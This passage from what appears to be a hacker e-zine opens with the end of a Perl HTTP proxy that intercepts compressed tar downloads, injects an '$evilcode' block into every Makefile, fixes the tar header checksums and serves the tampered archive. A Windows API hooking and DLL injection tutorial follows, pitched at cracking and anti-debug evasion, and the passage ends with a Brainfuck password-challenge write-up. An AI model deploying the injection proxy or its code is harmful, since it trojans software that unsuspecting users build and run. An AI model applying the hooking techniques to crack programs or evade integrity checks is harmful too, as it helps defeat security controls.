.= $tarbuf; $tarbuf = ""; # for file header blocks, we consider injection } else { my $filename = substr($tarbuf, 0, 100); my $filesize = oct(substr($tarbuf, 124, 12)); # we inject to Makefiles if ($filename =~ /Makefile\x00/) { # part of header before checksum my $precs; # after checksum my $postcs; # checkusm my $cs = 0; printf ("Injecting 512 bytes to file: %s %d\n", $filename, $filesize); # increase file size by 1 block $precs = substr($tarbuf, 0, 124) . sprintf("%011o ", $filesize + 512) . substr($tarbuf, 136, 12); $postcs = substr($tarbuf, 156, 512 - 156); # calculate header checksum foreach (split(//, $precs)) { $cs += ord; } foreach (split(//, $postcs)) { $cs += ord; } $cs += 8*32; # inect $evilcode + padding of spaces to 512 bytes $tarbuf = $precs . sprintf("%06o%c ", $cs, 0) . $postcs . $evilcode . " "x(512-length($evilcode)); printf ("New block size: %d\n", length($tarbuf)); } # update the start of next header $tarskipto += 512; if (($filesize / 512) == int($filesize / 512)) { $tarskipto += $filesize; } else { $tarskipto += (int($filesize / 512) + 1) * 512; } $retbuf .= $tarbuf; $tarbuf = ""; } } return $retbuf; } sub handle_injection { $buf = shift; #printf ("Got %d bytes from server\n", length($buf)); # for unknown files, simple passthrough if (not $inject) { $c->write($buf); #printf ("Wrote %d bytes to client\n", length($buf)); } else { # if we have new data, uncompress it if (length($buf) > 0) { print $uncompr_out $buf; } #printf ("Gave %d bytes to uncompressor\n", length($buf)); # first try to read the compressed input, to clear the pipeline while ($compr_sel->can_read(0.01)) { #$packed = <$compr_in>; $compr_in->read($packed, 1024); $c->write($packed); #printf ("Got from compressor and wrote %d bytes to client\n", # length($packed)); last unless length($packed) > 0; } # next, try to read the uncompressor, inject and feed the compressor while ($uncompr_sel->can_read(0.01)) { #$unpacked = <$uncompr_in>; $uncompr_in->read($unpacked, 1024); my $injected = inject_tar $unpacked; print $compr_out $injected; #printf ("Got from uncompressor and wrote %d bytes to compressor\n", # length($unpacked)); last unless length($unpacked) > 0; } } } } # listener my $d = HTTP::Daemon->new(LocalAddr => "0.0.0.0", LocalPort => 8000, Reuse => 1) || die; # serve requests while (my $c = $d->accept) { # extract request requisites my $r = $c->get_request; break unless defined $r; print "New request\n"; # get request bits my $host = $r->header("Host"); my $headers = $r->headers; my $uri = $r->uri; my $method = $r->method; my $content = $r->content; if (not defined $host) { # sucks. $host = "localhost"; } print "$method $host $uri\n"; # request original content my $s = Net::HTTP->new(Host => $host) || die $@; #$s->write_request($method, $uri, $headers, $content); $s->write_request($method, $uri, 0, $content); my($code, $mess, %h) = $s->read_response_headers; $c->send_status_line( $code, $mess ); $c->send_crlf; # write back init_inject($c, $uri); while (1) { my $buf; my $n = $s->read_entity_body($buf, 8192); die "read failed: $!" unless defined $n; last unless $n; handle_injection($buf); #$c->write($buf); } end_inject; $c->close; undef($c); } --------------------------------------------------------------------[ EOF ]----- [==============================================================================] [---------------------------[ Userland API Hooking ]---------------------------] S0ban> - -- - - - - = == ================================================] _.d####b._ .############. .################. .##################.__ __ __ __ _ _ __ __ ##############/´_`|#\ V V // _` | '_/ -_) ##############\__,|# \_/\_/ \__,_|_| \___| ###########>"<###### *#########( )####* ##########>.<##### ################ *############* "T######T" 0. Overview ------------------------------------------------------------------] API hooking is essentially the act of intercepting an API function call, and modifying it's functionality somehow, either by redirecting it to a function of our choice, or stopping the function from being called, or logging the request... the possibilities are endless. This is useful for cracking applications, especially when the application does gay stuff like hardcode API offsets (funny story, that...) and check itself for integrity in memory. Unfortunately, API hooking under Windows - without going down the rabbit hole of Kernel Mode Programming - has long been a poorly documented subject. What little documentation is available is often incomplete or erroneous, and based more than theory than in practice, basically without adequate information for someone to actually implement a working API hook. Also, while it is already possible to monitor API calls with a debugger (or use a pre-built library such as Microsoft Detours), implementing your own API hooking system is good programming practice, and will help reinforce your knowledge of the PE format - always a good thing, if you want to do some reversing or hacking on Windows. Without further ado, into the flames. 1. Preparation - Background Information, PE Format, Points of Attack ---------------------------------------------------------------------] When a program is loaded into memory, a virtual memory space is created for it (for each process), which holds the actual program and each DLL it needs loaded at load-time (e.g. DLL's the programs calls functions from, e.g. kernel32.dll, user32.dll). The program itself (the core PE file) and the DLL's are collectively referred to as modules. You can load a process in WinDbg and observe this for yourself. 1.0 "I've Googled a bit, what's this DLL injection stuff?" --------------------] DLL injection is a subject often used in the same forum post as API hooking, and for good reason. When we do API hooking, we're effectively asking the target process to execute our code instead of a given function - for example, by hooking MessageBoxW, we're asking the program to run our code instead of the MessageBoxW contained in user32.dll, a part of the Windows OS. However, the target process must have the replacement code to execute within it's own virtual memory space. DLL injection is the cleanest way to get code into the target process's virtual memory space. We avoid directly writing our code into the other process's memory space, as we can't be sure what we're overwriting - what may seem to be a long string of zeroes may infact be used by the program for decompression, etc etc. 1.1 Import Address Table Hooking ----------------------------------------------] When the core PE file is loaded into memory, it's structure is similar to the PE structure on disk (see Iczelion's tutorials on PE format, they are quite thorough). Unlike on disk, however, there is no need to convert virtual addresses to physical ones, as everything is already in it's appropriate (virtual) address. Each process is by default loaded at the base address of 0x00400000, starting with the IMAGE_DOS_HEADER structure. Following on from this, the IMAGE_NT_HEADERS structure is located at 0x00400000 + IMAGE_DOS_HEADER.e_lfanew (as per on disk). This structure contains the Import Address Table (IMAGE_NT_HEADERS.OptionalHeader.DataDirectories[1]). This table contains a list of the API functions the program imports. This list is filled in at load time by the windows PE loader, which fills the list in with the actual in-memory locations of these API functions. When the program wants to call an API function, it simply looks up the location of the function from this Import Address Table. Assuming we have already injected a DLL into the target process containing our code, we can redirect a function to our code by changing it's entry in the Import Address Table. The original API is still loaded at it's original place in memory, so to call it, we simply save the address of the original API when hooking, look it up, and call that function when we're done with our processing. In summary, the process of hooking an API using IAT hooking is as follows: - Open the target process - Inject a DLL containing our custom function - Locate the Import Address Table - Locate the specific entry for the function we need -- Save this entry, incase we want to call the original later - Replace that entry with one pointing to a custom function 1.2 Inline Hooking ------------------------------------------------------------] When the core PE file is loaded into memory, the PE loader conveniently also loads any other DLLs the program needs (for example, if the program calls MessageBoxA, user32.dll will be loaded). These DLL's are also mapped into the process's memory space, as in the following diagram: ----------------------------- ---------------- Notepad.exe [... Import Address Table ...] Main: printf("hi"); exit(0); ... ---------------- ---------------- kernel32.dll [... Export Address Table ...] ExitProcess: add eax,1 ... ---------------- ---------------- user32.dll [... Export Address Table ...] MessageBoxA: push ecx ... ---------------- ---------------- more.dlls [... Export Address Table ...] AnotherFunction: xor ecx,edx ... ---------------- ----------------------------- In the header structures of these DLLs are Export Address Tables, which is a list of each function the DLL exports, along with it's corresponding location in the DLL. Knowing where the DLL is located in the host process's memory space (using WinAPI, we can enumerate the modules in a process), and knowing where a function is in a DLL, we can locate where the function is in the process's memory space. Inline hooking involves locating a target function in this manner, then modifying the code of the target function in order to make the target function jump to a location the user specifies once it starts executing. ---------------------------------------------------------- MessageBoxA: MessageBoxA: [After] mov edi, edi push offset hookMessageBoxA push ebp ret mov ebp, esp ... ... ... ---------------------------------------------------------- The greatest advantage of this type of modification over IAT patching is that it's fairly flexible, and evades a lot of common anti-debugging tricks such as checking for IAT hooks. Additionally, we are able to hook API's which aren't imported by the target program (e.g. API's loaded via GetProcAddress API call). Also, there's greater flexibility in potential hook locations thanks to Win32's API design: ------------------------------------------------- ApiFunction() -> ApiFunctionEx() / ApiFunctionW() ------------------------------------------------- Many Win32 API's are simply wrappers for other API's. For example, MessageBoxA "subcontracts" it's work to MessageBoxExA, which in turn calls MessageBoxTimeoutA, which then calls MessageBoxTimeoutW. With inline hooking, we are able to hook at any point of this call chain, including MessageBoxTimeoutW, which will also catch MessageBoxW calls. In summary, the process of inline hooking is as follows: - Open the target process - Locate the DLL containing the function we want to hook within the target process's memory space - Locate the target function within the target DLL, map that to the memory space - Inject a DLL containing our custom function, locate our custom function within the newly injected DLL, map to memory space of target process - Store first six bytes/prelude (implementation-dependent, explained below)of the "old" function - Patch the "old" function to point to our custom function 2. Implementation Specifics ---------------------------------------------------] The most important part of any technique is implementation, without implementation we are nothing. This section is not a step-by-step guide to implementing an API hooking system, it simply outlines some of the more common pitfalls with import address table and inline hooking, and how to avoid them. 2.0. How to get the location of our "replacement" function --------------------] The easiest method is to parse the export address table of our DLL either in-memory or on-disk, and retrieve it from there. Alternatively, use GetProcAddress and LoadLibrary on our custom DLL from within our custom DLL's DllEntry function. 2.1 I need to hook functions from when a program starts executing, I don't want to miss any API calls ----------------------------------------] The obvious solution would be to use CreateProcess with the CREATE_SUSPENDED flag to create the thread and parse it - however, you can't inject a DLL into a process with a suspended primary thread, because the primary thread is suspended, and can't load your DLL (or any DLLs). Thus, we implement a small hack - we parse the PEB of the target program (use NtQueryProcessInformation to find the PEB) to find the image's base address and thus it's entrypoint, and save it. We then modify the first two bytes at the entrypoint to simply loop back to itself ("\xEB\xFE", or "jmp $-2"). We use Get/SetThreadContext to set our thread's instruction pointer (just modify the EIP register in the CONTEXT structure) to the entrypoint which we located earlier, then ResumeThread. This puts the thread into an infinite loop, without truly suspending it - the thread does nothing useful, but continues to execute and load modules. After loading our DLL's, we SuspendThread again, restore the first two bytes at the entry point, and use Get/SetThreadContext to reset the primary thread's instruction pointer, and use ResumeThread to wake our process, effectively "unfreezing" it. In summary: - Need to hook right from the beginning of a process? -- No: ExitProcess(0); -- Yes: ---- Use CreateProcess[Ex] to create the target process with CREATE_SUSPENDED ---- Use NtQueryProcessInformation to find the PROCESS_BASIC_INFORMATION struct ---- Read the PEB from our target process's memory space (located at PROCESS_BASIC_INFORMATION.PebBaseAddress). ---- Find the ImageBaseAddress from the PEB - that's where the core process is located in memory. Parse the PE headers to find the process's entry point. ---- Save the first two bytes at the entry point, replace them with \xEB\xFE ---- Use GetThreadContext on the primary thread (still suspsended) to get a CONTEXT structure. Modify EIP to point to the entry point. ---- Use SetThreadContext to install the modified CONTEXT structure ---- Resume the thread with ResumeThread. The primary thread will now run in an infinite loop at the entrypoint, but it won't be suspended. ---- Sleep() for a short period to let the DLL's that were originally going to load with the DLL load. When creating a process with CREATE_SUSPENDED, not all DLL's are fully loaded when you can first take control of the process. ---- [ Load DLL's, hook API's, make general eliteness here ] ---- Suspend the thread again with SuspendThread ---- Restore the two bytes at the entry point ---- Use GetThreadContext on the primary thread to get CONTEXT, set EIP to the entry point ---- Use SetThreadContext to install the modified CONTEXT ---- Push button ---- ??? ---- Receive 2 bacon, 6 internets and 1 win. 2.2 DLL loading isn't instant, how do I tell when my DLL is loaded? -----------] Generally, simply use some communications channel between your DLL and your "injector" applet/loader, such as IPC pipes. Alternatively, use WaitForDebugEvent with a timeout, and wait for a LOAD_DLL_DEBUG_EVENT, or just implement a timeout (using a fixed length of time). If you load your process in a frozen state and hook the API's you need from there. 2.3 How do I call the original function when I use inline hooking? ------------] There are different ways to restore the the original functionality of the hooked function when using inline hooking. The best method will depend on how you patched the original call. One suggestion (my method) is to patch the original call with a PUSH (offset of your replacement function), followed by RET. This solves the problem of relative offset calculation (use an absolute offset in the push), and preserves the stack (unlike CALL). Here's how to restore the original functionality: 2.3.0 Patch the call (one-off hooks, functions you only need hooked once) - Retrieve the location of the original hooked API (communicate with the process that did the hooking, or LoadLibrary and GetProcAddress) - Retrieve the bytes overwritten during patching (or hardcode them) - Restore the first few bytes of that hooked function, write directly to memory. 2.3.1 Emulate the first few instructions of the orignal function - Retrieve the location of the original hooked API (communicate with the process that did the hooking, or LoadLibrary and GetProcAddress) - Recreate the stack as you got it, with the exception of the return addr: ---------------------------------------------------------------------] For example, the hook function: hook_recv PROC s:DWORD, buf:DWORD, bLen:DWORD, flags:DWORD ;; stack is at state 1 (on the left, diagram below) push flags push bLen push buf push s ;; the stack as you got it is effectively duplicated lea eax,retAddr push eax ;; create a new return address mov eax,recvOffset ;; WSARecv mov edi,edi push ebp mov ebp,esp push ecx add eax,6 ;; stack is at state 2 (on the right, below) ;; eax is WSARecv + 6, the number of bytes you emulated. push eax db 0C3h retAddr: ret hook_recv ENDP ---------------------------------------------------------------------] Stack frames: Original stack frame Recreated Stack Frame [RETNADDR] [retAddr] ---\ [s] [s] | [buf] [buf] >-- destroyed by real recv func [bLen] [bLen] | [flags] [flags] ---/ [RETNADDR] [s] [buf] [bLen] [flags] 3. Summary --------------------------------------------------------------------] In summary, API hooking is a powerful and flexible, but under-utilised technique. In this document, two methods are outlined for implementing user-land API hooking, and will hopefully help you write your own custom API hooking system. Happy hacking. Remember - cheat for life, cheat to win. [ EOF ] [==============================================================================] [--------------------------[ The Brainfuck Challenge ]-------------------------] [==============================================================================] _.d####b._ .############. .################. .##################.__ __ __ __ _ _ __ __ ##############/´_`|#\ V V // _` | '_/ -_) ##############\__,|# \_/\_/ \__,_|_| \___| ###########>"<###### *#########( )####* ##########>.<##### author: zshzn ################ email: vzshzn|gmail|com *############* "T######T" --[ 00 ]----------------------------------------------[ Table Of Contents ]----- 1 The Challenge 1.1 Brainfuck 1.2 Translating 1.3 Understanding 2 Wordlist Attack 2.1 filter.c 2.2 Results 3 Cryptanalysis 3.1 Kasiski Method 3.2 Z Method 3.3 Analysis 3.4 Alternative 4 Known Plaintext Attack 4.1 Motivation 4.2 kpt.pl 4.3 Results 5 Conclusions --[ 01 ]--------------------------------------------------[ The Challenge ]----- In the last zine rattle published a small challenge, a simple brainfuck programs with no instructions. This little piece explains how I went about attacking the challenge. 1.1 Brainfuck __gd++++++++++[>+++>++bp__ _g++++>+P^^""j+++"^""^^++++<<>^>.+b d++ +; ""^^+++.p_ _d[-]^" :<- -.[ "^-]b `---b_ d---' _gg----bpd[++p_d+bpp_ `+++b d+++ _d+>,----------]<[[>]>b d+<< d[<]<++>>[>]<-]<[[>>+<<[<]b_ <->b d>[> d]<-]<[<]]>]<++++++P^^T+++++ +++b d++[ '<-------->-]<[[-]++++bggpd++++b_ ++[b :>++ _+++++++<-]>---.-----.---.-.-----p___g_ --.; <<]; d>>>>[[[<<<<+>>>>-]>]<<<+^"^++++++^^+++[; :>-- :--- :>--->---->----:->-------_ "^--bpd>---_ ---; ---; :-->---------->b------>^^--p_ `--->---; :--- :>-- :--->---->------ `^^^' "^>-p_ l-`-> ---; :--- >---->--------- `-->p__;-b ---; >--; -->---->------; `-----:>b :--- ---; >---------->--- -b _ :--- :--- d->--->---->----_ -b___-b >--; :--- _g->---->------>-----p____________gp__ :-`^^^' >--; -->; `^^'----------->--->----->---->-------p_ -b___ :->- :--- ->----->----->---->---------->-----b_ "^" ---; -->; `----------->------>----------->----b :--- :--- >----->------>---->----->---------->; ---; ---b _ :>-`--->----->----->----->------>----; d--- ---b >----; :>---->----[<]>-]>--->-->+>+++>++> d>++ >++b `^^' +>+ "^++>++++>->----->>----->+++>- d--- >>-b -- ->--->----->++>->++++>>+>-;d->+ +>+b_ ' +>->>+>++>->--->-->--->---->+ `+++>p_ d>->----->++++>+>+>+++>+++>-' `-->--p______g--->++>+++>++++>++>+++>----' "^>+++>++++>>++++>>----->->----[<]>[^" "^<<+<[<]>[[>]<+>>-<<[<]>-]>[>^" ""]<->>.[-]>]]++++++++++." 1.2 Translating To understand the code, first I translated it into a language that I could debug more easily. I could use gdb (and a C brainfuck interpreter) or a custom-built brainfuck debugger, but instead I took this avenue. I used some bf-to-perl translator, and then I split it into understandable chunks, added some commenting, and made a tiny eightbit implementation. Unfortunately I did not optimize the actual output, so it's very dirty and repetitive. #!/usr/bin/perl use strict; use warnings; use Data::Dumper; use constant OVERLOAD => 1; package Eightbit; sub new { my ($class, $start) = @_; bless { VAL => ($start || 0) % 256 }, $class; } # The reason I do the is because rattle (and bf programmers in general) abuse # integer overflow. So what are negative numbers in Perl (or excessively large # numbers) actually wrapped in eightbit (standard) bf implementations # This is horribly dirty. # Very incomplete implementation of an eight-bit data type. use overload '++' => sub { ++$_[0]->{VAL}; $_[0]->{VAL} %= 256 }, '--' => sub { --$_[0]->{VAL}; $_[0]->{VAL} %= 256 }, 'bool' => sub { $_[0]->{VAL} }; package main; # Ugh. my @m; my $p = 0; # You may wonder just why I create an array of Eightbit objects, instead of one # object that acts as a container for eight-bit items. # Elementary, Watson. I already had the Perl generated, and did not want to # change all my $m[$p] to $m->{$p} or $m->item($p) or any other interface! OVERLOAD and $m[$_] = new Eightbit for 0 .. 80; # My debugging subs, of course # I don't think they are in use in the program as I've copied it, but they were # crucial to understanding it. sub display { print "\nindex: $p\n"; print "\@m[$_] = $m[$_]\n" for 0 .. $#m; # print "\@m[$_] = $m[$_]:@{[chr $m[$_]]}\n" for 0 .. $#m; } sub marker { print "\n[here]\n"; } sub i { print "\nindex: $p\n"; } # Commence program # Printing "PW: " $m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++; $m[$p]++;$m[$p]++; while($m[$p]){ ;$p++;$m[$p]++;$m[$p]++;$m[$p]++;$p++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++; $m[$p]++;$m[$p]++;$p++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++; $m[$p]++;$m[$p]++;$p--;$p--;$p--;$m[$p]--; }; $p++;$p++;$p++; print chr $m[$p]; $m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++; print chr $m[$p]; while($m[$p]){$m[$p]--;} $p--;$m[$p]--;$m[$p]--; print chr $m[$p]; while($m[$p]){$m[$p]--;}; $p--;$m[$p]++;$m[$p]++; print chr $m[$p]; # INPUT while($m[$p]){$m[$p]--;} $p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--; while($m[$p]){ $m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++; $m[$p]++;$m[$p]++;$p++; $m[$p]= new Eightbit(ord getc); $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--; }; $p--; # Input of ABCDEF gets us: # \0\0\0ABCDEF # password starts at $m[3] # Note that rattle tends to index from 1 # Basically leaving $m[0] = 0 lets him find the bottom easily # He will do: [-]. To us: while ($m[$p]) { $p-- } to reduce the index value # until hitting a blank value # It takes a bit of effort to travel from one end of the array to the other # So rattle has variables, then a blank entry, then the password, then a blank # entry, then more variables. That's probably the best way to do it. # So note that he uses counters that are positioned before and after strings while($m[$p]) { while($m[$p]){; $p++; # Go to the back of the string (excluding counters at end) }; $p--; # Down one, last item in password while($m[$p]){; $p++;$p++;$m[$p]++;$p--;$p--; # Increase point two chars right by 1 (some # extra counter val) while ($m[$p]) { $p--; } # Get down to before password $p--; $m[$p]++;$m[$p]++; # Counter $m[1] += 2 $p++;$p++; # Counter to start of pw while($m[$p]){; $p++; }; $p--; # Last char $m[$p]--; # last char -1 }; # We have eliminated the last letter, on to the one before it $p--; while($m[$p]){; while($m[$p]){; $p++;$p++;$m[$p]++;$p--;$p--; while($m[$p]){; $p--; }; $p--; $m[$p]--; # $m[1]-- $p++;$p++; while($m[$p]){; # Same deal, just increase counter by one # instead of two $p++; }; $p--; $m[$p]--; }; $p--; while($m[$p]){; $p--; }; }; $p++; }; # We have added double the last letter in the password to Counter 1, then # subtracted the second last from Counter 1 # We continue left: # ABCDEF -> FEDCBA -> 70*2 - 69 + 68*2 - 67 + 66*2 - 65 # Rather oddly he has shifted the entire string two characters to the right $p--;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++; $m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++; # $m[2] = 16; while($m[$p]){; $p--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--; $p++;$m[$p]--; }; # $m[1] -= 128 $p--; OVERLOAD or $m[1] %= 256; # Brainfuck values exist in eight-bit chars. # You can do the above to make the hash work if you don't want to use # overloading # $m[1] = 0; # Uncomment this to bypass the next part if you're too lazy to use # a real password # I test with the passwords " " and "0chunk" # The first is perfectly balanced, the second abuses overflow. # This loop just destroys our hard work to produce WRONG while($m[$p]){; while($m[$p]){; $m[$p]--; }; $m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++; $m[$p]++;$m[$p]++; # $m[1] = 10; while($m[$p]){; $p++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++; $m[$p]++;$p--;$m[$p]--; } ;$p++;$m[$p]--;$m[$p]--;$m[$p]--; # BEGIN printing WRONG print chr $m[$p]; $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--; print chr $m[$p]; $m[$p]--;$m[$p]--;$m[$p]--; print chr $m[$p]; $m[$p]--; print chr $m[$p]; $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--; print chr $m[$p]; # END printing WRONG $p--;$p--; } # To avoid losing, $m[1] must equal 0 # See how that worked? He "hashes" the password you give him # If the sum of two times the even letters (by reverse index) sub the odd # letters equals 128, you move on # This still allows for a nearly unlimited (other than by interpreter) amount # of possible working passwords, restricted to eightbit hash space. # Basically 1/256 of possibilities will pass since we're in eight-bit space. # I prefer " ", it's fun! # Now our PW is stored in indexes $m[5] and up $p++;$p++;$p++;$p++; # Get to the first char # This condition fails if our hash failed, and the program falls through to # termination while($m[$p]){; while($m[$p]){; while($m[$p]){; $p--;$p--;$p--;$p--;$m[$p]++;$p++;$p++;$p++;$p++;$m[$p]--; } $p++; } # we move it to $m[1] and up ;$p--;$p--;$p--;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++;$m[$p]++; $m[$p]++;$m[$p]++;$m[$p]++; # to right of last char is 10 while($m[$p]){ $p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--; $m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--; $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--; $m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++; $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--; $p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++; $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--; $m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;;;$m[$p]--;$m[$p]--;$m[$p]--;$p++; $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;;;$m[$p]--; $m[$p]--;$m[$p]--;$m[$p]--;;;$p++;$m[$p]--;$m[$p]--;;;$m[$p]--;$m[$p]--;$p++; $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--;;;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--; $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;;;$p++;$m[$p]--;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--; $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--; $p++;$m[$p]--;$m[$p]--;;;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--; $m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--; $m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++; $m[$p]--;$m[$p]--;;;$m[$p]--;$m[$p]--;$p++;;;$m[$p]--;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++; $m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--; $p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--; $p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;;;$m[$p]--;$m[$p]--;$p++;;;$m[$p]--; $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--; $p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--; $p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;;;$m[$p]--;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++; $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++; $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--;;;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++ ;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;;;$p++;$m[$p]--;$m[$p]--;$m[$p]--; $m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--; while($m[$p]){;$p--;}; $p++;$m[$p]--; }; $p++;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$p++;$m[$p]++;$p++; $m[$p]++;$m[$p]++;$m[$p]++;$p++;$m[$p]++;$m[$p]++;$p++;$p++;$m[$p]++;$m[$p]++; $p++;$m[$p]++;$m[$p]++;$m[$p]++;$p++;$m[$p]++;$m[$p]++;$m[$p]++;$p++;$m[$p]++; $m[$p]++;$m[$p]++;$m[$p]++;$p++;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--; $m[$p]--;$m[$p]--;$p++;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++; $m[$p]++;$m[$p]++;$m[$p]++;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$p++; $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]--;$m[$p]--;$m[$p]--;$p++; $m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$m[$p]--;$p++;$m[$p]++;$m[$p]++;$p++; 